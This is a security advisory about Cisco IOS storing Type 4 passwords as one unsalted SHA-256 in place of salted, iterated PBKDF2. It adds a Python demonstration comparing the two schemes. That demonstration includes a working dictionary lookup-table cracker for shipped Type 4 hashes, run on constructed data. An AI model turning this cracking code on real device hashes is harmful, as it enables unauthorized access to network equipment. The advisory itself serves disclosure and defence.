Vigil@nce - Cisco IOS: weakness of Type 4 Password
April 2013 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
When the system stores passwords hashed with the Type 4 algorithm,
the parameters required by the RFC are not honored, which weakens the hash.
– Impacted products: IOS, Cisco Router xx00 Series
– Severity: 2/4
– Creation date: 18/03/2013
DESCRIPTION OF THE VULNERABILITY
The Cisco IOS system uses several hashing algorithms to store
passwords.
The Type 4 algorithm is specified as PBKDF2 (RFC 2898, Password-Based
Key Derivation Function version 2). In theory, Cisco IOS should use
the following parameters:
– hash function SHA-256
– salt of 80 bits
– 1000 hashing iterations
However, due to a coding error, the stored value is a single SHA-256
digest of the password, with no salt and no iteration count.
Because there is no salt, two accounts with the same password produce
the same Type 4 hash, and because a single SHA-256 computation is all
that is needed per guess, precomputed tables and dictionary or
brute-force attacks run at full speed against the stored value.
When the system stores passwords hashed with the Type 4 algorithm,
the parameters required by the RFC are therefore not honored, which
weakens the hash.
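The following Python example, added here to illustrate the bulletin and not taken from Cisco IOS or from the Vigil@nce bulletin, places the intended derivation (PBKDF2-HMAC-SHA256, 80-bit salt, 1000 iterations) next to what was actually shipped (one unsalted SHA-256 pass), and shows why the latter is trivially attacked with a precomputed dictionary. It assumes the password is UTF-8 encoded, that the 32-byte result is printed with the crypt-style "./0-9A-Za-z" alphabet without padding (an assumption about the on-device encoding, not something the bulletin states), and uses a small constructed wordlist.

```python
import base64
import hashlib
import secrets

# Assumption: the 32-byte digest is shown in the crypt-style "itoa64" alphabet
# with no '=' padding (43 characters). The bit grouping is the same as base64,
# only the alphabet differs, so we translate from the standard alphabet.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TO_ITOA64 = str.maketrans(STD_B64, ITOA64)

SALT_BYTES = 10        # 80-bit salt called for by the design
ITERATIONS = 1000      # iteration count called for by the design


def encode_itoa64(digest: bytes) -> str:
    """Base64-style encoding of a digest using the itoa64 alphabet, no padding."""
    return base64.b64encode(digest).decode("ascii").rstrip("=").translate(_TO_ITOA64)


def type4_as_shipped(password: str) -> str:
    """What the buggy implementation does: one SHA-256 over the password,
    no salt, no iterations. The same password always yields the same string."""
    return encode_itoa64(hashlib.sha256(password.encode("utf-8")).digest())


def type4_as_intended(password: str, salt: bytes, iterations: int = ITERATIONS) -> str:
    """What RFC 2898 / PBKDF2 with the stated parameters would have produced.
    The salt must be stored next to the hash for verification; it is omitted
    from the returned string here to keep the comparison to the shipped form direct."""
    if len(salt) != SALT_BYTES:
        raise ValueError("Type 4 design calls for an 80-bit (10-byte) salt")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return encode_itoa64(dk)


def build_lookup_table(wordlist):
    """Precompute hash -> password once. This is only possible because the
    shipped scheme has no salt: one table serves every device and every user."""
    return {type4_as_shipped(word): word for word in wordlist}


def crack_type4(hash_str: str, table: dict):
    """Recover a password from a shipped Type 4 hash by table lookup."""
    return table.get(hash_str)


def demo() -> dict:
    """Run the comparison on constructed data and return the observations."""
    # Constructed sample: two administrators who chose the same password.
    shipped_a = type4_as_shipped("hashcat")
    shipped_b = type4_as_shipped("hashcat")

    # With the intended scheme each account gets its own random salt.
    intended_a = type4_as_intended("hashcat", secrets.token_bytes(SALT_BYTES))
    intended_b = type4_as_intended("hashcat", secrets.token_bytes(SALT_BYTES))

    # Constructed wordlist standing in for a real dictionary.
    table = build_lookup_table(["admin", "cisco", "password", "hashcat", "Cisco123"])

    return {
        "shipped_hash": shipped_a,
        "shipped_collide": shipped_a == shipped_b,      # True: no salt
        "intended_collide": intended_a == intended_b,   # False: per-user salt
        "cracked": crack_type4(shipped_a, table),       # "hashcat"
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The shipped form is exactly one SHA-256 per candidate, so a cracker does not need the device at all once it has the string; the intended PBKDF2 form would force 1000 HMAC-SHA256 computations per guess and a separate table per salt.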
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Cisco-IOS-weakness-of-Type-4-Password-12541